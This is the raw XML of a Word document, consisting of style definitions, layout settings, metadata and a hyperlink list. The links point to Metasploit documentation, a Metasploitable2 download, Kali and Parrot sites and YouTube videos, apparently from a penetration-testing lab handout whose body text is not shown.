  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00D170A9"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004B407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HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004B4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4B407A"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000F0370"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CD4BB4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00666B86"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:eastAsia="en-IN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00D5580E"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000245F8"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00700777"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style-scope">
    <w:name w:val="style-scope"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006E6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608497">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1223517195">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="374475717">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1092237013">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="455023670">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="525801187">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="809713032">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="811677677">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="817723139">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1491754826">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1110128567">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1723670535">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1116755766">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1194151008">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1111167046">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1372729414">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1390421738">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2134518415">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1536965219">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1594120889">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="902523927">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1614484521">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1721782637">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1689599089">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1847400472">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2143692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forge.net/projects/metasploitable/files/Metasploitable2/"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youtube.com/redirect?event=video_description&amp;redir_token=QUFFLUhqbjd0WVVzNWxmamQtbmQweEkxRE9NYmpKUmhIQXxBQ3Jtc0tucjhVOW9RZVZBVWo5RmstNWJqUXRhZ3Y1dlN1Snk2OGZULXVKYVNfVEpvOEktUUI1WG0tdkt6aW4xY0E1WElja3FHMjFQdFpNOFQ5Q0k0U2FsbHQ2bWl5S0ZRRUQwczhnYXJ2V0U0NzRuRTk3OHI2SQ&amp;q=https%3A%2F%2Fwww.parrotsec.org%2F&amp;v=ShOb8bQ_h_I" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.metasploit.com/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html"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youtube.com/redirect?event=video_description&amp;redir_token=QUFFLUhqbnVEVU5FckZiNTZMM051eDVXVkctV1A1Q2Fnd3xBQ3Jtc0tsWUxfTVZBdjduSU92Vm5WcTdNcmtBaHZOdjdBSEdBSXQzclhXb2k3emdYdDkwNXdXemxaeHllMTZGcnlkNEE2U3BvYmFTRmlSYy1pNDl3VmFtcFNYd2w4MTF4VDQtNGFpMzJJLVZBQzU5aFNpR3ZGVQ&amp;q=https%3A%2F%2Fwww.kali.org%2F&amp;v=ShOb8bQ_h_I" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=WNKr2TgJsGc" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/redirect?event=video_description&amp;redir_token=QUFFLUhqbE9BeHY4Y0VWbjdMaXlfRUl3b0dIcHNNZUVPQXxBQ3Jtc0tuQlBFcDhqc0tCQXNjTDE5aHhBN0VncjF2S1piaWNjM0kwNUlJSk1KYlJxc1N6SVRXYXhURWZjZUdDbHRqV3VSR3JPWTJkTXp2TjJLNG9mc1RFbVAybVNTOTY0NUJzdzlIc2puTV92T3FES3VVZ2MxYw&amp;q=https%3A%2F%2Fwww.vmware.com%2F&amp;v=ShOb8bQ_h_I" TargetMode="Externa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yperlink" Target="https://www.youtube.com/watch?v=ShOb8bQ_h_I" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.metasploit.com/docs/development/maintainers/downloads-by-version.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=s4-N2sfmJe8"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658</TotalTime>
  <Pages>1</Pages>
  <Words>1541</Words>
  <Characters>8788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LJMCA</cp:lastModifiedBy>
  <cp:revision>164</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-12T06:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-01T10:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>